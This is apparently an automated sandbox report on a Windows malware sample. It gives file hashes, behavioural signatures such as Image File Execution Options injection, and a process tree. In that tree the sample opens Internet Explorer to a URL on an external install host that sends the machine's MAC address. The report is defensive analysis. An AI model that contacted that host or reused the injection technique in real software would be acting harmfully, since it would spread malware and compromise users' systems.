Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    50s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08/07/2024, 03:50

General

  • Target

    2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe

  • Size

    45KB

  • MD5

    2ae1676267039c16727bf25f624c51a0

  • SHA1

    e86fdb3e58645365b4472131790c23de0ec56cb1

  • SHA256

    cc91d838372d82e789e05698467ef34d6491d5b6fcf3450a3a16668068374394

  • SHA512

    64339d1c89e8f91b088d94d367aa45afa2cb7af429262301e39b065c6b3faca5044fc709ba8aaa5cc169891d75caf78b574c5f370fe7333519bfb237e91331ac

  • SSDEEP

    768:rMVvp3w/ZKldEsWiZ0ggt4rbRtoDLtpehEX8bJrcnwSKQdd6Mr2SWxb/zrFJnlQp:rMVvp3w/4SsWs3rsDLtpsJ1XQPrijMko

Score
8/10

Malware Config

Signatures

  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 12 IoCs
  • Drops file in Windows directory 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 15 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3444
      • C:\Users\Admin\AppData\Local\Temp\2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe
        "C:\Users\Admin\AppData\Local\Temp\2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe"
        2⤵
        • Event Triggered Execution: Image File Execution Options Injection
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:1936
        • C:\program files\internet explorer\iexplore.exe
          "C:\program files\internet explorer\iexplore.exe" "http://www.qqqt8.cn/bw/install.asp?ver=081129&tgid=huiqu&address=EA-A3-B7-AF-2F-C1&regk=1&flag=5eb2a6c511a00329530db3bff9a1f8b3&frandom=6373"
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1220
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1220 CREDAT:17410 /prefetch:2
            4⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:3492
    • C:\Windows\system32\AUDIODG.EXE
      C:\Windows\system32\AUDIODG.EXE 0x244 0x3fc
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3484

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads